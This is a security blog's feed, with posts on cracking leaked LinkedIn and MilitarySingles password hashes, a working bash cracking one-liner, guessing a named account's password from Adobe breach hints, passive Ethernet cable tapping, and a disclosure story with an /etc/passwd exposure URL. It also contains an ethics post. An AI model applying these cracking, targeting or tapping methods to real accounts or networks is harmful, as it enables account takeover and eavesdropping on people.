tag:blogger.com,1999:blog-425234874683315572024-03-18T02:47:06.307-07:007 Habits of Highly Effective HackersJoshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.comBlogger12125tag:blogger.com,1999:blog-42523487468331557.post-45425728406316966962013-11-01T13:35:00.000-07:002013-11-03T11:45:37.890-08:00Can someone be targeted using the Adobe breach?<span style="background-color: #9fc5e8;"><span style="color: blue;"><span style="font-size: xx-small;">Note: As a professional courtesy to those at Adobe who are doing their absolute best to mitigate this breach, I have partially redacted all full hashes and email addresses from this blogpost, besides those found in the image published by arstechnica.com.</span></span></span><br />
<br />
We all know about the recent 153 Million account dump from Adobe. As arstechnica showed, the format looks something like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdn.arstechnica.net/wp-content/uploads/2013/11/adobe-passwords-copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://cdn.arstechnica.net/wp-content/uploads/2013/11/adobe-passwords-copy.jpg" width="640" /></a></div>
<br />
<span style="font-size: x-small;">Image source: http://arstechnica.com/security/2013/11/how-an-epic-blunder-by-adobe-could-strengthen-hand-of-password-crackers/</span><br />
<br />
As you can see, there's some sort of ID number, the email address, the encrypted password (which from the arstechnica article we now know is 3des) and the password hint.<br />
<br />
Password hints are great and all, but they can be unreliable, unclear, or flat out wrong.<br />
HOWEVER, when you have thousands of people using the same password (same encrypted string) looking at all of those password hints together can make the cleartext password painfully obvious.<br />
For example. Let's get the most common encrypted password strings from the dump (with numbers on the left showing how many times they were used):<br />
<br />
1911867 EQ7fIp*****=<br />
446144 j9p+********************==<br />
345833 L8qbAD**********CatHBw==<br />
211659 BB4e6X+b*************w==<br />
201569 j9p*****2ws=<br />
124248 dQ*****PYvQ=<br />
113880 7*****Veq8I=<br />
83409 PMDTbP**********FUvYGA==<br />
<br />
<br />
Now let's take that first, most common password string, and go get all the users' hints who used that same password. Let's also uniq those and sort them by how popular that actual hint is:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/JYgeI44.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="http://i.imgur.com/JYgeI44.jpg" width="640" /></a></div>
<br />
<br />
One can reasonable guess what password corrisponds with EQ7fIp******= <br />
<br />
Now let's see what else we can do with this. Let's use this same method to see if we can target an individual account in the Adobe dump. Funny enough, there's an entry for an account edwardsnowden@******mail.com.<br />
6**58***-|--|-edwardsnowden@******mail.com-|-B***************CatHBw==-|-|--<br />
<br />
<br />
Now let's see if any other people in the dump have the exact same password hash as this account, and if so then how many.<br />
[jdustin@localhost passwords]$ grep B***************CatHBw== cred | wc -l<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/KvrgODf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="http://i.imgur.com/KvrgODf.jpg" width="640" /></a></div>
<br />
<br />
Okay, let's grab those 207 the lines containing all accounts who used that same password, cut out just their password hints, and then sort them by how often that hint is in the list:<br />
[jdustin@localhost passwords]$ grep B***************CatHBw== cred | cut -d"|" -f5 | sort | uniq -c | sort -nr | head -n50<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/nmFhR49.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="530" src="http://i.imgur.com/nmFhR49.jpg" width="640" /></a></div>
<br />
<br />
So, Metal? 74W on the table of elements? The usual Tung?<br />
"tungsten" perhaps? Your guess is as good as mine. :)<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/8cO2OSJ.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://i.imgur.com/8cO2OSJ.jpg" width="320" /></a></div>
<br />
<br />Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com464tag:blogger.com,1999:blog-42523487468331557.post-30335020989932088822013-04-23T10:46:00.000-07:002013-04-23T14:45:29.326-07:00Being a good internet citizen A large percentage of breaches are discovered by having a third party mention to you that you're insecure. I would estimate it to be well over 50%.<br />
Because of that, when I come across things that are vulnerable I typically try to let the company know so they can fix it. Most of these are simple things that are indexed by google that were not meant to be public (see <a href="http://7habitsofhighlyeffectivehackers.blogspot.com/2012/04/let-google-be-your-guide.html">this post</a> on google hacking).<br />
<br />
I sometimes get responses, but typically do not. The most common response is a simple thank you email. I've had less nice responses as well, such as people angrily demanding to know what my intentions were. No good deed goes unpunished.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ySmbXxF.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ySmbXxF.gif" /></a></div>
<br />
<br />
Recently I sent an email to a company to let them know they had a misconfiguration that makes every file on their box viewable (with the permissions of the httpd user) by the entire world. Looked kind of like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVmm6Gsheo0VxiqmqUgEj1vW8QrFoWBrFd_g-CWZ7nVlb76iGaUXyn0IG3D-vgPjiyXWFL5MaosjQxsayRUQ_0KeF_T-ZwD5PquknJW2y8vzG7rxT42F3PdeHiYBLUU8rJAUJt6jqz_Vg/s1600/ouch.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVmm6Gsheo0VxiqmqUgEj1vW8QrFoWBrFd_g-CWZ7nVlb76iGaUXyn0IG3D-vgPjiyXWFL5MaosjQxsayRUQ_0KeF_T-ZwD5PquknJW2y8vzG7rxT42F3PdeHiYBLUU8rJAUJt6jqz_Vg/s320/ouch.jpg" width="320" /></a></div>
<br />
<br />
Plus, everything on their box had been indexed by google. Imagine your backups and config files being freely down-loadable and searchable on google!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ASqr6cd.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="http://i.imgur.com/ASqr6cd.gif" width="320" /></a></div>
<br />
<span style="font-size: large;">Even worse, there wasn't just one domain hosted on this vulnerable box...a reverse lookup of the IP showed that the server was hosting <b>576 domains!</b></span><br />
<br />
<br />
So I sent them a simple email:<br />
<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">Attention Information Security,<br />I saw this site on google, and
happened to notice that you appear to have a sym link in your document
root that points back to / allowing access to your entire system through
the webserver.<br />
For example, your passwd file SHOULD NOT be publicly viewable.<br /><a href="http://xxxxxxxxx.com/eth/1.txt/etc/passwd" target="_blank">http://XXXXXXXXX.com/<span style="font-size: x-small;">x.txt</span>/etc/passwd</a><br /><br />Please let me know if you have any questions.<br />
Thank you,</span></blockquote>
<br />
I received a response from them, which included this:<br />
<blockquote class="tr_bq">
<span style="font-size: x-small;">It's worth noting that /etc/passwd does not contain any sensitive
information, and that although we do not widely publish our
configuration, we do not generally consider it to be sensitive as
it is relatively trivial to reverse-engineer by experimentation
and observation. We conduct regular reviews of our platform's
security and take extensive measures to ensure that our servers
stay secure. </span></blockquote>
<br />
Huh. Okay.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/2sVtQ.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://i.imgur.com/2sVtQ.gif" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-size: xx-small;">Note: <span style="font-size: xx-small;">N</span>ames have been redacted to protect the ignorant.</span>Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com92tag:blogger.com,1999:blog-42523487468331557.post-1097976832487788052013-04-19T14:19:00.001-07:002013-04-19T14:19:43.656-07:00All, I noticed a tweet by<a href="https://twitter.com/hdmoore"> HD Moore </a>today giving a shout out to this post written last week by <a href="https://twitter.com/edskoudis">Ed Skoudis</a>. Very good read. Here's a link and an excerpt: <br />
<br />
http://pen-testing.sans.org/blog/pen-testing/2013/04/08/when-offense-and-defense-become-one<br />
<br />
"at sufficiently advanced technical levels, offense and
defense sometimes merge and become one. Offensive techniques can be
used to achieve defensive ends; defensive means can be used to achieve
offensive ends; and, sometimes, the inherent technical skills of offense
and defense are actually identical."<br />
<br /> <br />
"Consider these examples:<br />
<ul>
<li><em>Endpoint security suites:</em> Have you ever
pondered what these tools really are? With their integrated anti-virus,
personal firewall, and host-based Intrusion Prevention Systems, they
operate at a fairly low-level of most operating systems, hooking all
kinds of system calls so that administrators can maintain control of the
machine. Wait... that's a rootkit! The only difference between an
endpoint security suite and most rootkits is the level of functionality
and who controls it: good guy administrators or bad guys. So, we've got a
multi-billion dollar segment of the infosec industry that is actually
built on selling commercial rootkits, also known as endpoint security
suites."</li>
</ul>
Ed Skoudis is a very dynamic teacher there at SANS, and I recommend his courses to everyone. <br />
Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com16tag:blogger.com,1999:blog-42523487468331557.post-49998376000283115862013-01-31T13:42:00.000-08:002013-01-31T13:52:47.704-08:00Habit 1I gave a presentation at a conference last year, and someone commented that if I have a blog called "the 7 habits of highly effective hackers", I should probably have a list of 7 actual habits on said blog. I guess that's fair.<br />
<br />
So here we go starting with habit 1, which I promise will be the only non-technical habit of the 7.<br />
<br />
<b>Habit 1: Effective hackers know that the game they play IS the real world.</b><br />
In a sentence; <u>Effective Hackers understand the repercussions of their actions.</u><br />
There's something about computer systems that causes many people to act in a way that they never would in real life. Some of us would never read a stranger's physical mail, yet would feel no guilt whatsoever about reading their email. We make silly excuses to justify why our online world is different than our real world. That person should have changed the default password on their router; they're stupid and deserve it. That company knows their environment/product is insecure, if they wanted to keep me out they'd have fixed it.<br />
<br />
Think this one over. Although there's no CVE number for it yet, it is now being reported that human beings are vulnerable to having bricks thrown at their heads. All versions are affected, and easy methods for exploiting this weakness have reportedly been in the wild for some time now....Would anyone think that the public disclosure of this knowledge, would in any way justify them throwing bricks, and hurting others? Are we more justified because they should have known better?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLyvU-uC5kJCNUuQhF8gZ_6IDXt_VllfaH09qGgIG4poLNI4rtk6bq-UP8p8TVnFBRmTBgh5nO4EEKB4p3bMh5J2v05cxONARYTbFVfjAFyJvj104pV_cg2UvD831f6OoMNDir9Cbnets/s1600/brick.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLyvU-uC5kJCNUuQhF8gZ_6IDXt_VllfaH09qGgIG4poLNI4rtk6bq-UP8p8TVnFBRmTBgh5nO4EEKB4p3bMh5J2v05cxONARYTbFVfjAFyJvj104pV_cg2UvD831f6OoMNDir9Cbnets/s320/brick.jpg" width="320" /></a></div>
<br />
This probably all sounds really preachy. I'm actually not trying to tell you that you should feel guilt for hurting others (that's between you and your own conscience). I AM trying to say you should <u>understand</u> the repercussions of your actions. If you post someone's PII on pastebin, someone, A REAL PERSON, will experience real grief over it. When you gain access to someone's network, it could mean real impact for that organization. Real people could lose their jobs over it. I'm not telling you to care, I'm telling you that you MUST understand.<br />
You must do whatever you do with your eyes wide open. Know and accept all possible impacts of every scan, every exploit, every move.<br />
<br />
Okay, gotta go. My shirt just got out of the dryer. I'm sure we're all familiar with MITM (Mythbuster In The Middle).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBsruaCGl_PxVhuvf511FQp1bBwrdJ91jxOW7S2oBDgYpMoH7aXZ_5B7Lc_Gw6CsACut82POyf0prKCQxbx9NmMWKrGAUfroumb1tW7u5ra8HCrYQgQ63ZcWhp1_pDABV-Zpdw4iECj0o/s1600/photo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBsruaCGl_PxVhuvf511FQp1bBwrdJ91jxOW7S2oBDgYpMoH7aXZ_5B7Lc_Gw6CsACut82POyf0prKCQxbx9NmMWKrGAUfroumb1tW7u5ra8HCrYQgQ63ZcWhp1_pDABV-Zpdw4iECj0o/s320/photo.JPG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com36tag:blogger.com,1999:blog-42523487468331557.post-40160506935843158552012-08-22T15:39:00.000-07:002012-08-22T15:39:13.386-07:00Thanks, and UtahSAINT Conference 2012<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWIq3Stj-B1G1IZdegAtpMoy7yvLLw7M5kw_3W2wpDB_rE6VBLTDtBjpPsScTVWdtQ7ZObAfoLUUVEeWH4PzpXb6Z6LZH8AwK_6QUOgTbSqLOkZzVjToflOwHMP19cLLmZi9zjolsXCnc/s1600/99problems1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
First off, I'd like to thank all those who have build on my proof of concept, <a href="http://7habitsofhighlyeffectivehackers.blogspot.com/2012/05/using-twitter-to-build-password.html">Using twitter to build password cracking wordlist.</a> Some of you have seriously taken it to the next level, and I applaud your efforts.<br /><br />Including, but not limited to:<br /><a href="http://www.digininja.org/projects/twofi.php">http://www.digininja.org/projects/twofi.php</a><br /><a href="http://blog.hacktalk.net/twitscrape/">http://blog.hacktalk.net/twitscrape/</a><br /><a href="http://www.damnsecure.org/?p=833">http://www.damnsecure.org/?p=833</a><br /><a href="http://www.nathanv.com/2012/07/18/shell-script-use-twiter-and-bing-to-generate-wordlists/">http://www.nathanv.com/2012/07/18/shell-script-use-twiter-and-bing-to-generate-wordlists/</a><br />Nicely done, effective hackers.<br /><br />Now on to the main reason for this post. <br />I'll be presenting at the UtahSAINT Conference 2012, this upcoming Oct 9-12 in Saint George UT.<br />My topic will be "The 7 Habits of Highly Effective Hackers: Effective hacking techniques and countermeasures."<br />
<br />Other speakers include:<br /><span style="color: #274e13;">Kevin Young</span>- whose unique passphrase cracking techniques helped his team take 2nd place at this year's "crack me if you can" contest at Defcon<br /><span style="color: #274e13;">Miles Johnson</span>- Security Analyst at Utah State University (and my old mentor)<br /><span style="color: #274e13;">Special Agent Cheny Engtow</span>- of the FBI<br />
And many more...<br /><br />If you're attending the conference or just in the area, swing by and say hello.<br />
Until next time... <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWIq3Stj-B1G1IZdegAtpMoy7yvLLw7M5kw_3W2wpDB_rE6VBLTDtBjpPsScTVWdtQ7ZObAfoLUUVEeWH4PzpXb6Z6LZH8AwK_6QUOgTbSqLOkZzVjToflOwHMP19cLLmZi9zjolsXCnc/s1600/99problems1a.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWIq3Stj-B1G1IZdegAtpMoy7yvLLw7M5kw_3W2wpDB_rE6VBLTDtBjpPsScTVWdtQ7ZObAfoLUUVEeWH4PzpXb6Z6LZH8AwK_6QUOgTbSqLOkZzVjToflOwHMP19cLLmZi9zjolsXCnc/s640/99problems1a.png" width="640" /></a></div>
Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com7tag:blogger.com,1999:blog-42523487468331557.post-20064234488032834212012-08-15T15:12:00.002-07:002012-08-16T12:38:24.146-07:00Passively Cable Tapping Cat5<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYfqP0RgrsYw2cGc1LpZ0SOyQahVHiTgaitHEpOdEEJdGUfvL50FYntEXeJBCh9LVENGW9jADaVCNxF8SHOB0GzR8iSi4BEGHnmq6-AsHGJg2Wa1tJ1PcbMbv9Q3I8hPM0tjwHa2DVFc/s1600/wiretap1.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqYfqP0RgrsYw2cGc1LpZ0SOyQahVHiTgaitHEpOdEEJdGUfvL50FYntEXeJBCh9LVENGW9jADaVCNxF8SHOB0GzR8iSi4BEGHnmq6-AsHGJg2Wa1tJ1PcbMbv9Q3I8hPM0tjwHa2DVFc/s400/wiretap1.jpg" width="225" /></a>When someone shows off a novel idea/solution they came up with, there are typically about a thousand people who rush in to say "You should have done it this way instead." Then others who attempt to build on the idea, and make it easier and even cooler. In this post I will attempt the latter.<br />
<br />
In the most recent edition of <a href="http://www.2600.com/">2600, The Hacker Quarterly,</a> there was a story entitled "BUILDING A CAT-5 CABLE TAP" that details how to create a passive hardware cable tap using alligator clips. I love seeing stuff like this. The author came up with this idea, made it work, and posted it for all to share.<br />
<br />
This past spring while in a server room with a friend/co-worker, we noticed a cable that ran through our cage that belonged to a different group within our company. We joked about cutting it, attaching a RJ45 end to each side, and sticking a hub on it. The conversation progressed to methods for doing this passively, without having to cut the wire. Soon we came to the same idea as the author, and decided we could use alligator clips.<br />
<br />
Later on that week I was online reading about wall jacks and decided to give this a try. I picked up a cat5 end for 1.40 at home depot. I stripped a small length of the cat5 outer shielding, and punched the wires down into the wall jack. Make sure you use a tool bit that doesn't cut the wire on one side.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00YXNfEMkaBn3hg2qkCkFC8r9bDZfd2vI5Add1jpe4PMUzt9b59-8PKzkAkoNLnAohHNufLg2qMaXRHOz7MF4oOxJK3QfmK2zDNu7tNw7hAUssH38aTwR0t23hDMi6Jsl8CUs4T1Q7mk/s1600/wiretap2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00YXNfEMkaBn3hg2qkCkFC8r9bDZfd2vI5Add1jpe4PMUzt9b59-8PKzkAkoNLnAohHNufLg2qMaXRHOz7MF4oOxJK3QfmK2zDNu7tNw7hAUssH38aTwR0t23hDMi6Jsl8CUs4T1Q7mk/s640/wiretap2.jpg" width="640" /></a><br />
<br />
<br />
<br />
<br />
This worked great. The target machine didn't even drop a packet. Basically the exact same thing as using alligator clips, but much less stripping.<br />
<br />
My hat is off to the author of the article. I hope you don't mind me expanding a little on your idea.Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com12tag:blogger.com,1999:blog-42523487468331557.post-71300816476056309942012-06-06T13:02:00.001-07:002012-06-06T13:07:11.533-07:00Cracking the 3.5 Million Password Hashes That Were RedactedThe release of millions of SHA1 hashes from linkedin.com has the internet all buzzing today... but then comes the news that 3.5 million of them have the first 5 characters redacted and replaced with 00000.<br />
Well, if we don't have the entire hash we can't crack them... Oh wait, we still have the remaining 36 characters to do a comparison against.<br />
So let's try this:<br />
First, let's get just the hashes that start with the 00000. Looks like there are 3,521,180.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_6-w6Kn-2sTsYs6I3CQxe2NUoGMJjT_PLjwOP1kBLDLjoYNW-jnRGYRSNwC7SlKFphdYWmta8-2bLikIK4NLty4Z8iSPGGSeEA7ZiUdjajTRcRAXp5ljv3V_SA2acB4DidxHDavgWfa4/s1600/0003.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_6-w6Kn-2sTsYs6I3CQxe2NUoGMJjT_PLjwOP1kBLDLjoYNW-jnRGYRSNwC7SlKFphdYWmta8-2bLikIK4NLty4Z8iSPGGSeEA7ZiUdjajTRcRAXp5ljv3V_SA2acB4DidxHDavgWfa4/s640/0003.png" width="640" /></a></div>
<br />
<br />
Now, for each line in our word list (WORDS.txt) lets calculate the SHA1 hash, chop off the first 5 characters, and compare that to our hashes list. If the partial hash is there, echo the password to the screen.<br />
For those that can't see that, the command is:<br />
for i in `cat WORDS.txt` ; do grep -q `echo -n $i | sha1sum | cut -b6-41` SHA1-0s.txt && echo $i ; done <br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuSNu8tfxWLc-pBqUGOhQtg3nti-7XSDOy2NMCB8-opwpQeE9cqGmQiYyk6Z2EyzFRny8LAnwbs9q_e2a8gwlsFEKKZi6T9Glxf1QOx8e1bdqgyGaiU5z0xD_upeTo5jrbdGCuKtuad-g/s1600/0002.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuSNu8tfxWLc-pBqUGOhQtg3nti-7XSDOy2NMCB8-opwpQeE9cqGmQiYyk6Z2EyzFRny8LAnwbs9q_e2a8gwlsFEKKZi6T9Glxf1QOx8e1bdqgyGaiU5z0xD_upeTo5jrbdGCuKtuad-g/s640/0002.png" width="640" /></a><br />
<br />
And boom, there are thousands of passwords scrolling down the screen.<br />
Enjoy.Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com9tag:blogger.com,1999:blog-42523487468331557.post-53220207405481246362012-05-31T16:58:00.002-07:002012-06-01T18:06:34.429-07:00Using twitter to build password cracking wordlistThis is going to be a quick one. We're going to show how to use twitter to build a word list for cracking passwords.<br />
We'll use John the Ripper, and as a target we'll use the MilitarySingles.com md5 password hashes that were released by the artist formerly known as lulzsec.<br />
<br />
First, let's hack out a quick script that will get relevant tweets for us. And yes, I use a lot of tabs. And I know I can do this cleaner... I'm in a get it done quick mood.<br />
<span style="font-size: x-small;">(EDIT: thanks to Supercow1127 and TheShadowFog for pointing out better ways to deal with JSON. See jshon, jsawk, etc).</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Ugw2EiFx07lI4YXN7g5G8LtNh9P-mApsJvkcdEoIAjHO0I_Tb1KVhlQf91T3Xouw0cmcknb2CwMNcSU7dwTMVp5_v9AAS_oVNX92HaXXFv93gisNeGJthg5Us61-KuubnYinsQl_5mk/s1600/john1a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Ugw2EiFx07lI4YXN7g5G8LtNh9P-mApsJvkcdEoIAjHO0I_Tb1KVhlQf91T3Xouw0cmcknb2CwMNcSU7dwTMVp5_v9AAS_oVNX92HaXXFv93gisNeGJthg5Us61-KuubnYinsQl_5mk/s640/john1a.png" width="640" /></a></div>
The script will connect to twitter and get 500 tweets for the term supplied, then barf back all the words from those tweets in a list for us. Next we are going to pass the script some words that might be relevant to our target.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-TKvlY_dJnWLsSXnAzpXAt4DvCzYJk50Lf9kCPqMvl86X9aXhkuixAfq_8Beu8LxXnusSC-eNKS1m4Q6GV1iTpkuFRPdPwlj49b5X-0TWqSXgucPzvDmC6vINJstL5-1dY7ODPI-w74/s1600/john2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji-TKvlY_dJnWLsSXnAzpXAt4DvCzYJk50Lf9kCPqMvl86X9aXhkuixAfq_8Beu8LxXnusSC-eNKS1m4Q6GV1iTpkuFRPdPwlj49b5X-0TWqSXgucPzvDmC6vINJstL5-1dY7ODPI-w74/s640/john2.png" width="640" /></a></div>
After we sort the list out, we're left with 4400 unique words. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5FsmAkyanpHFttocJ86TiQkmU4jl6pVyr3Iyt70CD0BiXMclahyphenhyphencPNHO2tvSwjltf-Ax4_lDoB20oC-djtZtW1rJbUixU-iElUUQZnH98ebj4T9MGj1H5IIZ13soCgzeEMVtw3zX1HY/s1600/john3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl5FsmAkyanpHFttocJ86TiQkmU4jl6pVyr3Iyt70CD0BiXMclahyphenhyphencPNHO2tvSwjltf-Ax4_lDoB20oC-djtZtW1rJbUixU-iElUUQZnH98ebj4T9MGj1H5IIZ13soCgzeEMVtw3zX1HY/s640/john3.png" width="640" /></a></div>
Let's try
those words against our hashes and see how many of them are used as
passwords. We'll use the --rules option so that it mangles up various permutations of each word. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQuJm0QCqK4wcb51OzdgHX8hMuImYRzW8xFifpwrExYHbDh6qAFHjJdWzXaq09Ssnawh64VLipprtilQBkwBZkQ2EwI1IyWwQZySyBl1hdXAWyiMeciYnThrKhta_ld56fRvtoIdVYIGI/s1600/john4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQuJm0QCqK4wcb51OzdgHX8hMuImYRzW8xFifpwrExYHbDh6qAFHjJdWzXaq09Ssnawh64VLipprtilQBkwBZkQ2EwI1IyWwQZySyBl1hdXAWyiMeciYnThrKhta_ld56fRvtoIdVYIGI/s640/john4.png" width="640" /></a></div>
And here come the passwords.....(scrolled off the screen)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Mf1no2wYqBTZYTCSYn3e4gu6QT9JGG4gX0JIUcQhbQwWJeD8OgGFDW90fJAyANFuXA8JvBMgEcICYzE571o3wwu0r5tG9FqmHnhyphenhyphenOtGLvaBW5tj4g5fq0_WEhcPwMVmAw4Oyy0RIOLg/s1600/john5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Mf1no2wYqBTZYTCSYn3e4gu6QT9JGG4gX0JIUcQhbQwWJeD8OgGFDW90fJAyANFuXA8JvBMgEcICYzE571o3wwu0r5tG9FqmHnhyphenhyphenOtGLvaBW5tj4g5fq0_WEhcPwMVmAw4Oyy0RIOLg/s640/john5.png" width="630" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So, from our word list of 4400 words, we yielded 1978 passwords. Let me say that again... <br />
FROM OUR WORD LIST OF 4400 WORDS, WE YIELDED 1978 PASSWORDS!<br />
<br />
And that's 1978 uniques. The number of accounts we actually cracked with these 1978 passwords is actually even more than 4400 accounts cause many use the same passwords as each other, and with the mangling rules John tries ~300 mutations of each word in the list (semperfi gives us semperFi, semperfi1, semperfi123, etc).<br />
<br />
This is a very small example of what can be done to generate more relevant password lists using twitter/websites/social media to supply you with the related words. Download john, hash your passwords, build a list of words relevant to your organization, and test the security of your passwords. Heck, we haven't even started talking about GPUs and oclhashcat, but we'll leave that for another time.<br />
<br />
Until next time, if you're going to hack, hack effectively.<br />
<br />
<br />
<br />
<span style="font-size: x-small;">And props to Kevin Young. Thanks for all the lengthy discussions about password security. I truly enjoy picking your brain.</span>Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com73tag:blogger.com,1999:blog-42523487468331557.post-32034136063781896772012-04-05T10:33:00.004-07:002012-04-05T10:41:06.618-07:00Let Google Be Your GuideEveryone knows that google is a great tool for finding information on the internet. What many don't realize is that google indexes many things that people didn't intend to make public, and makes them easily found with very little effort.<br />There are many search "operators" that every hacker/security person should know about, such as:<br />site:<br />filetype:<br />inurl:<br />intitle:<br />These operators can be used together as well as with normal search criteria.<br /><br />One very simple search I performed yesterday led me to send this email today:<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV6de-n5itfHn-pIExswomM1FpAKjEmI6lnDWVO1_ftKhUhqOrwyI9IBpBS0CBhypAfnHLHlwPESxJkzxlEk_NyAmOe8TDok_Nj9J2JXTkYvm07mJXe9l92dumQaREZsOLxDeyRWtbhOY/s1600/email.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 381px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV6de-n5itfHn-pIExswomM1FpAKjEmI6lnDWVO1_ftKhUhqOrwyI9IBpBS0CBhypAfnHLHlwPESxJkzxlEk_NyAmOe8TDok_Nj9J2JXTkYvm07mJXe9l92dumQaREZsOLxDeyRWtbhOY/s400/email.jpg" alt="" id="BLOGGER_PHOTO_ID_5727971328855057410" border="0" /></a><br 